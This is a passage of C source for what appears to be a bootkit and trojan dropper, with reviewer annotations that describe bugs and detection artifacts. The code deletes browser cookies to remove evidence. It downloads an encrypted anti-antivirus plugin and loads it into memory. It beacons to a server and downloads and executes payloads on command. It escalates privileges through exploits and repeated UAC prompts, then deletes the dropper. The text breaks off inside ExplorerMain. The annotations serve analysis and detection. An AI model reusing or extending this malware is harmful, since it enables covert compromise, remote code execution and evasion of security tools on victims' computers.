//
// Builds the full path to msinfo32.exe as a heap string allocated with
// STR::Alloc (the caller releases it with STR::Free, see
// DebugReportCreateConfigReportAndSend on this page).
// Default layout: <CSIDL_SYSTEM>\msinfo32.exe. When the reported OS major
// version is 5, the Program Files\Common Files\Microsoft Shared\MSInfo\
// layout is used instead. Returns NULL only when pGetVersionExA fails.
//
PCHAR GetPathToMsInfo32()
{
	int FolderId = CSIDL_SYSTEM;
	const char* PathSuffix = "\\";

	OSVERSIONINFOEXA ver;

	m_memset(&ver, 0, sizeof(ver));
	ver.dwOSVersionInfoSize = sizeof(ver);

	if (!(BOOL)pGetVersionExA(&ver)) return NULL;

	// Major version 5 (the "XP only" case in ExplorerRoutine's comments).
	if (ver.dwMajorVersion == 5)
	{
		FolderId = CSIDL_PROGRAM_FILES;
		PathSuffix = "\\Common Files\\Microsoft Shared\\MSInfo\\";
	}

	PCHAR Path = STR::Alloc(2 * MAX_PATH);
	// NOTE(review): the clear length is STR::Length(Path) on a freshly
	// allocated buffer — what it actually clears depends on how STR::Alloc
	// initializes the block (not on this page); confirm in STR.
	m_memset(Path, 0, STR::Length(Path));

	// Folder resolution result is not checked; the suffix and file name are
	// appended unconditionally.
	pSHGetSpecialFolderPathA(NULL, Path, FolderId, false);
	m_lstrcat(Path, PathSuffix);
	m_lstrcat(Path, "msinfo32.exe");

	return Path;
}
//
// Single-instance guard. Creates (or opens) the named mutex
// "Global\<MutexPrefix><machine id>" and tries to take ownership within 1 s.
// Returns true when ownership was acquired — the handle is then deliberately
// kept open so the mutex stays held for the process lifetime. Returns false
// when creation fails or the wait does not return WAIT_OBJECT_0 (the handle
// is closed in that case).
//
// Detection note: the name is deterministic per host (prefix + MakeMachineID()),
// so it is a stable artifact in handle/object listings; the LDRDBG line below
// also logs it verbatim.
//
bool TryToCatchHostLevelInstanceMutex(const char* MutexPrefix)
{
	// Fixed 200-byte name buffer; prefix and machine id are not length-checked.
	CHAR mutex_name[200];

	m_memset(mutex_name, 0, sizeof(mutex_name));

	PCHAR machine_id = MakeMachineID();
	m_lstrcat(mutex_name, "Global\\");
	m_lstrcat(mutex_name, MutexPrefix);
	m_lstrcat(mutex_name, machine_id);

	STR::Free(machine_id);

	LDRDBG("TryToCatchHostLevelInstanceMutex", "Mutex name '%s'.", mutex_name);

	SECURITY_ATTRIBUTES sa;
	SECURITY_DESCRIPTOR sd;

	// Security descriptor with a NULL DACL (DACL present, pointer NULL): every
	// local principal gets full access to the object, so any other process on
	// the host can open, hold or pre-create this mutex.
	pInitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
	pSetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);

	sa.nLength = sizeof (SECURITY_ATTRIBUTES);
	sa.lpSecurityDescriptor = &sd;
	sa.bInheritHandle = FALSE;

	HANDLE mutex_handle = (HANDLE)pCreateMutexA(&sa, FALSE, mutex_name);
	if (mutex_handle == NULL) return false;

	// Catch ownership of mutex and never release (1000 ms wait; an existing
	// owner makes this fail and the second instance backs off).
	DWORD wait_result = (DWORD)pWaitForSingleObject(mutex_handle, 1000);
	if (wait_result == WAIT_OBJECT_0) return true;

	pCloseHandle(mutex_handle);
	return false;
}
//
// Removes the current user's IE cookie files (*.txt) by handing the cookie
// folder to DeleteFiles together with hCab (DeleteFiles is not on this page;
// presumably it collects the files into the cab before deleting them — confirm).
//   os == 1: C:\Documents and Settings\<user>\Cookies\
//   os == 2: C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Cookies\
// The drive letter is hard-coded to C:. Returns 0 when done or when the user
// name cannot be read, -1 for an unknown os value.
//
// Detection note: this is evidence removal — expect a burst of file deletions
// under the user's Cookies folder.
//
int DeleteIECookies(int os, HCAB hCab)
{
	char username[256];
	// In/out: on return name_len holds the user name length including the
	// terminating NUL.
	DWORD name_len = 256;
	if(!(BOOL)pGetUserNameA(&username[0], &name_len)) return 0;
	//return 10;

	char *Path_cookies = NULL;

	switch(os)
	{
	case 1:
		// NOTE(review): the allocation sizes the suffix without its trailing
		// backslash and without a terminator, while the appended literal has
		// both; whether this is safe depends on MemAlloc rounding — confirm.
		Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Documents and Settings\\")+name_len+m_lstrlen("\\Cookies"));
		m_lstrcpy(Path_cookies,"C:\\Documents and Settings\\");
		m_lstrcat(Path_cookies,&username[0]);
		m_lstrcat(Path_cookies,"\\Cookies\\");
		break;
	case 2:
		// Same sizing pattern as case 1.
		Path_cookies = (char*)MemAlloc(m_lstrlen("C:\\Users\\")+name_len+m_lstrlen("\\AppData\\Roaming\\Microsoft\\Windows\\Cookies"));
		m_lstrcpy(Path_cookies,"C:\\Users\\");
		m_lstrcat(Path_cookies,&username[0]);
		m_lstrcat(Path_cookies,"\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\");
		break;
	default:
		return -1;
	}

	// Path_cookies is never released after this call.
	DeleteFiles(Path_cookies, "*.txt", true, false, hCab);
	/*
	if(Path_cookies == NULL) return -1;
	WIN32_FIND_DATA data;
	char *Path_cookies_find = (char*)MemAlloc(m_lstrlen(Path_cookies)+2);
	m_lstrcpy(Path_cookies_find,Path_cookies);
	m_lstrcat(Path_cookies_find,"\\*");
	HANDLE nFindFile = FindFirstFile(Path_cookies_find,&data);
	if(nFindFile==NULL) return -1;
	do
	{
		if(m_lstrcmp(data.cFileName,".")==0 || m_lstrcmp(data.cFileName,"..")==0) continue;
		char *Path_file = (char*)MemAlloc(m_lstrlen(Path_cookies)+m_lstrlen(data.cFileName)+1);
		m_lstrcpy(Path_file,Path_cookies);
		m_lstrcat(Path_file,"\\");
		m_lstrcat(Path_file,data.cFileName);
		if(!DeleteFile(Path_file))
		{
			DWORD err = pGetLastError();
		}
		//MemFree(Path_file);
	}
	while(FindNextFile(nFindFile,&data));
	FindClose(nFindFile);
	//MemFree(Path_cookies);*/
	return 0;
}
//
// Writes the lines of the global Manifest[] table, each followed by CRLF, to
// FileName via File::WriteBufferA and returns that call's result. The 1024-byte
// scratch buffer is fixed and not checked against the table contents (the
// table itself is not on this page). ExplorerRoutine uses this to place
// "<tmpexe>.manifest" beside the relaunched dropper copy.
//
BOOL SaveManifest(PCHAR FileName)
{
	PCHAR manifest = STR::Alloc(1024);
	BOOL ret;

	manifest[0] = 0;
	for ( int i =0; i< sizeof(Manifest)/sizeof(Manifest[0]); ++i)
	{
		m_lstrcat(manifest,Manifest[i]);
		m_lstrcat(manifest,"\r\n");
	};

	ret = File::WriteBufferA(FileName,manifest,m_lstrlen(manifest));
	STR::Free(manifest);
	return ret;
};
//
// Thread entry point. Exits immediately if the file named by GetStopAVPath()
// already exists. Otherwise it polls <current host>/cfg/stopav.plug every
// 5 minutes (DownloadInMem) until a download succeeds, writes the raw bytes to
// GetMiniAVPath(), then decrypts the blob (DecryptPlugin) and loads it from
// memory with MemoryLoadLibrary, unloading it straight away. lpData is unused.
// Always returns 0.
//
// Detection note: the periodic request with the fixed "/cfg/stopav.plug" path
// (assembled from single characters below, so it is not a contiguous literal
// in the image) and the file written at GetMiniAVPath().
//
DWORD WINAPI AvBlockThread( LPVOID lpData )
{
	if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES )
	{
		return 0;
	}

	char *Host = GetCurrentHost();

	if ( Host == NULL )
	{
		return 0;
	}

	// "/cfg/stopav.plug" built character by character.
	char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0};

	// Fixed 256-byte URL buffer; Host length is not checked before the copy.
	char AvBlockUrl[256];

	m_lstrcpy( AvBlockUrl, Host );
	m_lstrcat( AvBlockUrl, AvBlockFile );


	LPBYTE BotModule   = NULL;
	DWORD dwModuleSize = 0;

	// Retry forever; 1000 * 60 * 5 ms = 5 minutes between attempts.
	while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) ) 
	{
		pSleep( 1000 * 60 * 5 );
	}

	if ( BotModule != NULL && dwModuleSize )
	{
		// Persist the still-encrypted download to GetMiniAVPath().
		LPVOID FileData = MemAlloc( dwModuleSize + 1 );
		
		if ( FileData )
		{
			m_memcpy( FileData, BotModule, dwModuleSize );
			File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize );
			MemFree( FileData );
		}

		LPVOID Module = DecryptPlugin( BotModule, dwModuleSize );	

		if ( Module )
		{
			// In-memory load; the decrypted image is not written to disk here.
			HMEMORYMODULE hLib = MemoryLoadLibrary( Module );

			if ( hLib == NULL )
			{
				return 0;
			}

			// Freed immediately after loading; presumably the module's work
			// happens during its load — confirm against MemoryLoadLibrary.
			MemoryFreeLibrary( hLib );
		}
	}

	// Host, BotModule and Module are not released on any path.
	return 0;
}
//
// Computes the MD5 of "<system drive>\ntldr": takes the Windows directory,
// truncates it to "X:\" (path[3] = 0) and appends "ntldr". Writes the hex
// digest into Buffer and returns Buffer, or NULL when the digest string is
// empty or BufferSize < 33 (32 hex chars + terminator). Buffer is zeroed
// before those checks, so it is cleared even on a NULL return.
//
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize)
{
	CHAR path[MAX_PATH];

	pGetWindowsDirectoryA(path, MAX_PATH);
	path[3] = '\0';

	m_lstrcat(path, "ntldr");

	m_memset(Buffer, 0, BufferSize);

	string md5 = MD5StrFromFileA(path);

	if (md5.IsEmpty()) return NULL;
	if (BufferSize < 33) return NULL;

  	m_lstrcat(Buffer, md5.t_str());

	return Buffer;
}
//
// Obtain the path to the dropper so that it can be deleted later.
//
// Fills two globals: FileToDelete (ANSI path of the current module) and
// PathBkFile (<CSIDL_COMMON_APPDATA>\<MakeMachineID()>). PathBkFile is the
// "bootkit installed" marker polled by ExplorerMain and ExplorerRoutine.
// Detection note: a file under the common application-data directory whose
// name is the machine id is a stable per-host artifact.
//
VOID GetPaths()
{
	BOOL bUsed;
	PWCHAR buf =  (PWCHAR)MemAlloc(sizeof(WCHAR)*MAX_PATH);
	
	if ( buf )
	{

		pGetModuleFileNameW(NULL,buf,MAX_PATH-1);
		//pOutputDebugStringW(buf);
		// Narrow into sizeof-1 bytes; bUsed receives the "default char used" flag.
		pWideCharToMultiByte(CP_ACP,0,buf,-1,FileToDelete,sizeof(FileToDelete)-1,NULL,&bUsed);
		//pOutputDebugStringA(FileToDelete);
		PP_DPRINTF(L"GetPaths: FileToDelete='%S'", FileToDelete);

		buf[0]= 0;
		pSHGetSpecialFolderPathW(NULL,buf,CSIDL_COMMON_APPDATA ,TRUE);
		pWideCharToMultiByte(CP_ACP,0,buf,-1,PathBkFile,sizeof(PathBkFile)-1,NULL,&bUsed);
		MemFree(buf);
		m_lstrcat(PathBkFile,"\\");
		// The MakeMachineID() result is not released here (contrast with
		// TryToCatchHostLevelInstanceMutex, which frees it with STR::Free).
		m_lstrcat(PathBkFile,MakeMachineID());

		PP_DPRINTF(L"GetPaths: PathBkFile='%S'",PathBkFile);
	};
};
//
// Returns a heap string "<system drive>\<suffix>" where the suffix is
// STR::GetRightStr(UID, "0") applied to a freshly generated uid — presumably
// the part of the uid to the right of "0"; confirm against STR::GetRightStr.
// The same construction is inlined in ExplorerMain, which also writes the
// file. The caller releases the result with STR::Free.
//
PCHAR GetBootkitSignalFileName()
{
	PCHAR Path= STR::Alloc(MAX_PATH);
	PCHAR UID=STR::Alloc(120);

	pGetSystemDirectoryA(Path,MAX_PATH);
	GenerateUid(UID);
	// Keep only "X:\" of the system directory.
	Path[3]='\0';
	
	PCHAR Pref= STR::GetRightStr(UID,"0");
	m_lstrcat(Path, Pref);

	STR::Free(Pref);
	STR::Free(UID);
	
	return Path;
}
/************************************************************************/
//* Still need to add the memory release paired with MemAlloc in this procedure */
//
// Removes IE cookies for the current user. With bDeleteCookiesIndex the
// cookies index.dat is deleted first; with bDeleteCookies every entry returned
// by the WinINet cache enumeration is removed with DeleteUrlCacheEntry.
// Returns TRUE when the enumeration reaches ERROR_NO_MORE_ITEMS (or right
// after the index deletion when bDeleteCookies is FALSE), FALSE on any other
// failure. Detection note: evidence removal — a burst of cache-entry and
// index.dat deletions in the user's cookie store.
//
BOOL Delete_IECookies_Norm(BOOL bDeleteCookies, BOOL bDeleteCookiesIndex)
{
	DbgMsg("Delete_IECookies_Norm",0,"START");
	char szUserProfile[200]; 
	char szFilePath[200];
	HANDLE hCacheEnumHandle  = NULL;
	LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;
	DWORD  dwSize = 4096; // initial buffer size

	// Delete index.dat if requested. Be sure that index.dat is not locked.
	if(bDeleteCookiesIndex)
	{
		// Retrieve from environment user profile path.
		pExpandEnvironmentStringsA("%userprofile%", &szUserProfile[0], 
														 sizeof(szUserProfile)); 
		m_memset(&szFilePath[0], 0, sizeof(szFilePath));
		//m_memcpy(&szFilePath[0],&szUserProfile[0], m_wcslen(&szUserProfile[0])*sizeof(WCHAR));
		//m_memcpy(&szFilePath[m_wcslen(&szUserProfile[0])],L"\\Cookies\\index.dat", 36);
		
		m_lstrcpy(&szFilePath[0], &szUserProfile[0]);
		m_lstrcat(&szFilePath[0], "\\Cookies\\index.dat");
//		wsprintfW(szFilePath, L"%s%s", szUserProfile, L"\\Cookies\\index.dat");


		// The %userprofile%-derived path built above is overwritten by a
		// hard-coded literal (user "User" on C:), so the environment lookup
		// has no effect — looks like leftover test code.
		m_lstrcpy(&szFilePath[0], "C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat");
		pDeleteFileA(szFilePath);
		DbgMsg("Delete_IECookies_Norm",0,&szFilePath[0]);
		DWORD err = pGetLastError();
		// Log tag says pDeleteFileW; the call above is pDeleteFileA.
		DbgMsg("Delete_IECookies_Norm",err,"pDeleteFileW");

		if(!bDeleteCookies) return TRUE;
	}
	
	// Enable initial buffer size for cache entry structure.
	//lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
	// MemAlloc result is not checked before the write below.
	lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
	lpCacheEntry->dwStructSize = dwSize;
	
	// URL search pattern (1st parameter) options are:  "cookie:", "visited:", 
	// or NULL ("*.*"). Here only cookie entries are requested.
	hCacheEnumHandle = pFindFirstUrlCacheEntryA(_T("cookie:") /* in */, 
		                         lpCacheEntry /* out */, &dwSize /* in, out */);
	
	// First, obtain handle to internet cache with FindFirstUrlCacheEntry
	// for late use with FindNextUrlCacheEntry.
	
	if(hCacheEnumHandle != NULL) 
	{
		pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
		DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
	}
	else
	{
		switch(pGetLastError())
		{
            case ERROR_INSUFFICIENT_BUFFER:
				MemFree(lpCacheEntry);
			    //lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwSize];
				lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
			    lpCacheEntry->dwStructSize = dwSize;

			  // Repeat first step search with adjusted buffer, exit if not
				// found again (in practice one buffer's size adustment is  
				// always OK). Note the retry passes a NULL pattern, i.e. all
				// cache entries rather than "cookie:" only.
				hCacheEnumHandle = pFindFirstUrlCacheEntryA(NULL, lpCacheEntry, &dwSize);
				if(hCacheEnumHandle != NULL) 
				{
					pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
					DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
					break;        
				}
				else
				{
					// FindFirstUrlCacheEntry fails again, return.
					MemFree(lpCacheEntry);
					return FALSE; 
				}
			default:
				// hCacheEnumHandle is still NULL in this branch (FindFirst
				// failed), so this closes a NULL handle.
				pFindCloseUrlCache(hCacheEnumHandle);
				MemFree(lpCacheEntry);
				return FALSE;
		}
	}
	
	// Next, use hCacheEnumHandle obtained from the previous step to delete 
	// subsequent items of cache.

	do 
	{
	     // Notice that return values of FindNextUrlCacheEntry (BOOL) and 
		 // FindFirstUrlCacheEntry (HANDLE) are different.

		 if((BOOL)pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, &dwSize))
		 {
			pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
			DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
		 }
		 else
		 {
			 switch(pGetLastError())
			 {
                 case ERROR_INSUFFICIENT_BUFFER:
					//lpCacheEntry = //(LPINTERNET_CACHE_ENTRY_INFO);
					MemFree(lpCacheEntry);
					//new char[dwSize];
					lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO)MemAlloc(dwSize);
					lpCacheEntry->dwStructSize = dwSize;

					// Repeat next step search with adjusted buffer, exit if 
					// error comes up again ((in practice one buffer's size 
					// adustment is always OK).

					if(pFindNextUrlCacheEntryA(hCacheEnumHandle, lpCacheEntry, 
						                                               &dwSize)) 
					{
						pDeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
						DbgMsg("pDeleteUrlCacheEntry",0,&lpCacheEntry->lpszSourceUrlName[0]);
						break;          
					}
					else
					{
						// FindNextUrlCacheEntry fails again, return.
						pFindCloseUrlCache(hCacheEnumHandle);
						MemFree(lpCacheEntry);
						return FALSE; 
					}
				    break;
			     case ERROR_NO_MORE_ITEMS:
					 // Normal end of enumeration — the only TRUE exit of the loop.
					 pFindCloseUrlCache(hCacheEnumHandle);
					 MemFree(lpCacheEntry);
					 return TRUE; 
				 default:
					 pFindCloseUrlCache(hCacheEnumHandle);
					 MemFree(lpCacheEntry);
					 return FALSE;
			 }
		 } 
	} while (TRUE);

  return FALSE; // never here
}
//
// Beacons to Url with an HTTP/1.0 POST whose body is "id=<uid>" followed by
// the global LoadExe ("&plugins=" plus the MD5 of every URL fetched so far,
// "|"-separated). If the first line of the reply starts with "multidownload",
// each "http:..." item in the reply (items separated by "|") is downloaded to
// a temp file and started through ExecuteFile, and the MD5 of its URL is
// appended to LoadExe. Returns false on WSAStartup / ParseUrl1 / connect /
// send / receive failure, true otherwise.
//
// Detection note: fixed request shape (HTTP/1.0, "Accept: text/html",
// "Connection: Close", form-urlencoded body starting with "id="); the
// "multidownload" keyword is assembled from single characters below.
//
bool ReportToPlugin( char *Url )
{
	WSADATA wsa;

	// WSAStartup is done on every call; never matched by WSACleanup here.
	if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
	{
		return false;
	}

	char *Host = NULL;
	char *Path = NULL;
	int   Port = 0;

	if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
	{
		return false;
	}

	char Uid[100];
	GenerateUid( Uid );

	typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );

	// wsprintfA is resolved through GetProcAddressEx by hash, not by name.
	fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );

	char *UserAgent = NULL;
	UserAgent = (char*)MemAlloc( 1024 );
	DWORD dwUserSize = 1024;

	pObtainUserAgentString( 0, UserAgent, &dwUserSize );

	// Only an allocation failure is handled; the result of
	// pObtainUserAgentString itself is not checked.
	if ( UserAgent == NULL )
	{
		MemFree( UserAgent );
		UserAgent = "-";
	}

	char Request[] = "POST %s HTTP/1.0\r\n"
					 "Host: %s\r\n"
					 "User-Agent: %s\r\n"
					 "Accept: text/html\r\n"
					 "Connection: Close\r\n"
					 "Content-Type: application/x-www-form-urlencoded\r\n"
					 "Content-Length: %d\r\n\r\n";
	
	char Args[]	   = "id=";

	// Fixed 2048-byte packet; Path, Host and UserAgent lengths are not
	// checked against it.
	char *HttpPacket = NULL;
	HttpPacket = (char*)MemAlloc( 2048 );
	int iTmp;
	// LoadExe is a global; 9 == length of "&plugins=" (set below on first use).
	if (LoadExe!=NULL)	
	{
		iTmp=m_lstrlen(LoadExe); 
	}else iTmp=9;

	pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
	m_lstrcat( HttpPacket, Args );
	m_lstrcat( HttpPacket, Uid  );
 if (LoadExe==NULL)
  {   
   LoadExe = (char*)MemAlloc(10); 
   m_lstrncpy(LoadExe,"&plugins=",9);
 LoadExe[9]='\0';
  }
	m_lstrcat( HttpPacket, LoadExe  );

	SOCKET Socket = MyConnect1( Host, Port );

	// Host, Path and HttpPacket are not released on this path.
	if( Socket == -1 )
	{
		return false;
	}

	bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );

	MemFree( HttpPacket );

	// Socket is left open on a send failure.
	if ( !b )
	{
		return false;
	}

	DWORD dwSize = 0;

	char *Buffer = RecvAndParse( Socket, &dwSize );

	if ( !Buffer )
	{
		pclosesocket( Socket );
		return false;
	}

	// "multidownload" built character by character.
	char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
	char *Context;
	// Terminates Buffer at the first CR/LF; only the first line is inspected.
	m_strtok_s( Buffer, "\r\n", &Context );

	if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
	{
		// cPointer is computed but never used.
		char * cPointer= m_strstr(&Buffer[1],"http:");
		
		
		char* cUrl=Buffer;
		char* cUrlNext;
		int i;
		char *DownloadUrl;
		while (true)
		{
			cUrl= m_strstr(&cUrl[1],"http:");
			if (cUrl==NULL)break;
			// cUrlNext is NULL when no "|" follows; m_lstrlen would then
			// receive NULL.
			cUrlNext= m_strstr(cUrl,"|");
			i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
			// The +1 is applied to the returned pointer, not to the
			// allocation size; MemFree below receives the offset pointer.
			DownloadUrl = (char*)MemAlloc(i)+1; 
			m_lstrncpy(DownloadUrl,cUrl,i);
			DownloadUrl[i]='\0';
			

			if ( DownloadUrl )
			{
				// Record the MD5 of the URL (32 hex chars + "|") in LoadExe
				// so the next beacon reports it under "&plugins=".
				LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
				m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
				m_lstrcat( LoadExe, "|");


				WCHAR *FileName =(WCHAR *)GetTempName();

				if ( FileName && DownloadUrl )
				{
					ExecuteFile( DownloadUrl, FileName );
				}

				MemFree( FileName );
			}
		
			MemFree( DownloadUrl );
		}
	}
		MemFree( Buffer );
	pclosesocket( Socket );

	return true;
}
// Function that is called when injected into other processes.
// It checks its own privileges and tries to extend them (the original comment
// trails off here).
//
// Flow as visible below: UnhookDlls + BuildImport, then ExplorerMain(); if that
// fails, TakePrivileges() and a second ExplorerMain(); on OS major version 5
// (and when not running as a DLL) a DLL from the "DROPER_DLL" section is
// dropped to a temp file and handed to SpoolerBypass; if still not installed,
// the dropper is copied to a temp directory under "<DROPER_NAME_PREFIX><name>.exe"
// with a ".manifest" sibling and relaunched via ShellExecuteEx (up to 10 times
// per copy) until PathBkFile appears; a third ExplorerMain(); then the
// DeleteDropper thread is started. lpData is unused; always returns 0.
//
// Detection note: repeated UAC prompts for freshly copied executables in the
// temp directory, the companion .manifest files, and temp files written from
// the "DROPER_DLL" section are the host-visible artifacts of this routine.
//
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
	// 
	//	Create a separate thread for the deletion, since deleting the dropper can take more than a minute.
	//
	
	BOOL bRun = TRUE;
	BOOL bRet = FALSE;
	BOOL IsUsedExploit = FALSE;
	OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};

	UnhookDlls();

	BuildImport((PVOID)GetImageBase());

	PP_DPRINTF(L"ExplorerRoutine: started");

	if (! IsUserAdmin() )
	{
		PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
		// TakePrivileges() return codes 0 and 2 stop the run; the meaning of
		// the codes is not on this page — confirm.
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;	
		};

		PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
		IsUsedExploit = TRUE; // Supposedly this is always TRUE
	};		

	if ( bRun )
	{
		PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
	}
	
	/*		If we have admin rights but did not use the exploits and the install failed, use the exploits and do the install again		*/
	if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");

		IsUsedExploit = TRUE;
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;
		};
		if ( bRun )
		{
			PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
			bRet = ExplorerMain();
			PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
		}
	};

	// Result not checked; OSVer.dwMajorVersion is read below regardless.
	pGetVersionExA(&OSVer);

	
	/*		Drop the DLL to disk and use the spooler exploit, XP only		*/
	if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");

		DWORD DropSize = 0;	
		PVOID DropImage  = GetSectionData("DROPER_DLL",&DropSize);
		if ( DropImage && DropSize)
		{
			// Temp file on disk holding the embedded DLL — a file artifact.
			PCHAR DropFile = File::GetTempNameA();
			File::WriteBufferA(DropFile,DropImage,DropSize);
			SpoolerBypass(DropFile);
			STR::Free(DropFile);
		};
	};


	/*		Launch a copy of the dropper many times asking for elevated rights.		*/
	if (  bRet == FALSE )
	{
		PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");

		PCHAR tmpexe,dir,file ;
		PCHAR tmp_manifest;
		PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
		
		// The whole do/while below is the body of this if.
		if ( NamePrefix )
		do 
		{

			tmpexe = File::GetTempNameA();
			tmp_manifest = STR::Alloc(MAX_PATH+1);
			
			dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
			file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
		
			if (  tmp_manifest && dir && file)
			{
				STR::Free(tmpexe);
				// "<dir>\<prefix><tempname>.exe" and "<same>.manifest".
				tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
				// Early exit here leaks dir, file, tmp_manifest and NamePrefix.
				if ( ! tmpexe )
					return 0;
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,".manifest");
			};

			if ( tmpexe && tmp_manifest )
			if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
			{
				
				DWORD dwCode = -1;
				// Only cbSize, lpFile, lpParameters and fMask are set; the
				// remaining SHELLEXECUTEINFOA fields are left uninitialized.
				SHELLEXECUTEINFOA ExecInfo;
				
				// tmp_manifest is reused here as the parameter string:
				// "<tmpexe>   <ARGV_UAC_RUN>".
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,"   ");
				m_lstrcat(tmp_manifest,ARGV_UAC_RUN);

				ExecInfo.cbSize = sizeof(ExecInfo);
				ExecInfo.lpFile = tmpexe;
				ExecInfo.lpParameters = tmp_manifest;
				ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;

				// Up to 10 launches per copy; exit code 0 is treated as success.
				for ( int i = 0; i < 10; ++i )
				{
					PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);

					if ( pShellExecuteExA(&ExecInfo) == FALSE )
						break;

					// Process handle from SEE_MASK_NOCLOSEPROCESS is never closed.
					pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
					pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
					if ( dwCode == 0  )
					{
						PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
						break;
					}
				}
			};
			
			if ( tmpexe )
				STR::Free(tmpexe);
			if ( tmp_manifest )
				STR::Free(tmp_manifest);
			if ( dir )
				STR::Free(dir);
			if ( file )
				STR::Free(file);
		}
		while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) );	//	end do; loop until the bootkit marker file appears

		if ( NamePrefix )
			STR::Free(NamePrefix);
	};

	/*		If the install was unsuccessful try again, maybe we get lucky	*/
	if ( bRet  == FALSE)
	{
		PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
	}

	/*	 Delete the dropper	*/
	PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
	pCloseHandle(StartThread(DeleteDropper,NULL));
	
	// dwExplorerSelf is a global (not on this page); when set the host
	// process is terminated here.
	if ( dwExplorerSelf )
	{
		PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
		pExitProcess(0);
	}

	return 0;
}
// Function which, after checks, fires the start event in the Explorer process,
// which in turn triggers the installation of BkDll.
//
// Returns TRUE when the marker PathBkFile already exists or ExplorerStart(NULL)
// succeeds (in which case 4 bytes holding 1 are written to PathBkFile and the
// RebootThread / RebootNotifyThread threads are started). On success it also
// creates the "signal" file in the system drive root (same path construction
// as GetBootkitSignalFileName on this page). Returns FALSE otherwise.
//
BOOL ExplorerMain()
{
	BOOL ret = FALSE;
	bool BkInstalledSuccess = false;
	PP_DPRINTF(L"ExplorerMain: started");

	// Fire the explorer start event
	if ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES)
	{
